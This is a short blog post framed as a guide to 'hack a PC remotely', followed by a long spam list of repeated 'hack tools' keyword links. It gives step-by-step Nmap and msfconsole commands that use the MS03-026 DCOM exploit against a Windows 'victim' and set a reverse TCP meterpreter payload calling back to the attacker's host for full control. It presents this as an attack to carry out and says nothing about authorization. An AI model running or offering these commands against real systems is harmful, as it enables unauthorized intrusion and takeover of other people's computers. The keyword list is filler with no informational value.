30 ago 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

More information


  1. Android Hack Tools Github
  2. Hack Rom Tools
  3. Hack Tools Github
  4. Hacking Tools For Windows
  5. Hacker Tools 2019
  6. Hack Tools Online
  7. Pentest Tools For Android
  8. Hack App
  9. Hacking Tools For Games
  10. Nsa Hack Tools
  11. Hacker Tools Software
  12. Best Pentesting Tools 2018
  13. Hacking Tools For Windows
  14. Hacking Tools Pc
  15. New Hacker Tools
  16. Kik Hack Tools
  17. Hack Apps
  18. Pentest Tools Online
  19. Pentest Tools Windows
  20. Hacker Tools For Mac
  21. Nsa Hacker Tools
  22. Hacking Tools Mac
  23. Pentest Tools Bluekeep
  24. Pentest Tools Framework
  25. Hacker Tools For Ios
  26. Hacker Tools Free Download
  27. Hacking App
  28. Termux Hacking Tools 2019
  29. Hacking Tools Windows 10
  30. Hacker Tools Github
  31. Hacking Tools And Software
  32. Best Hacking Tools 2019
  33. Hack App
  34. Growth Hacker Tools
  35. Pentest Tools Alternative
  36. Ethical Hacker Tools
  37. Hack Tools For Mac
  38. Usb Pentest Tools
  39. Pentest Tools Subdomain
  40. Hacking Tools For Windows
  41. Pentest Tools Website Vulnerability
  42. Hacking Tools For Windows Free Download
  43. Hacking Tools For Pc
  44. Hacker Tools 2020
  45. Pentest Tools For Windows
  46. Hack Tools
  47. Hacker Security Tools
  48. Hacking Tools For Beginners
  49. Hack Tools 2019
  50. Hacker Tools Apk Download
  51. Hacker Hardware Tools
  52. Beginner Hacker Tools
  53. Pentest Tools For Mac
  54. Hacker Search Tools
  55. Pentest Tools Website
  56. Hacking Tools For Windows 7
  57. Pentest Automation Tools
  58. Hacker Hardware Tools
  59. Hacking Tools Kit
  60. Game Hacking
  61. Install Pentest Tools Ubuntu
  62. Nsa Hack Tools Download
  63. Hacker Hardware Tools
  64. Pentest Tools Windows
  65. Pentest Tools Alternative
  66. Hack Tools For Games
  67. Hacker Tools Apk
  68. Hacking Tools Pc
  69. Pentest Tools Nmap
  70. Pentest Tools Framework
  71. Beginner Hacker Tools
  72. Hacker Tools For Ios
  73. Blackhat Hacker Tools
  74. Hacking Tools Usb
  75. Kik Hack Tools
  76. Hacker Tools List
  77. Hack Tools For Windows
  78. Growth Hacker Tools
  79. Hacking Tools Kit
  80. What Are Hacking Tools
  81. Hacking Tools For Games
  82. Hacker Tools Online
  83. Pentest Tools Alternative
  84. Hacker Techniques Tools And Incident Handling
  85. Hacker Tools For Mac
  86. Hacking Tools For Kali Linux
  87. Black Hat Hacker Tools
  88. Free Pentest Tools For Windows
  89. Hack And Tools
  90. Hacker Security Tools
  91. Hacks And Tools
  92. Pentest Tools Review
  93. Hacking Tools
  94. Hacking App
  95. Free Pentest Tools For Windows
  96. Pentest Tools Linux
  97. Pentest Reporting Tools
  98. Pentest Tools
  99. Hacker Tool Kit
  100. Hacker Tools Software
  101. Hacker Hardware Tools
  102. Hacker Tools Linux

No hay comentarios: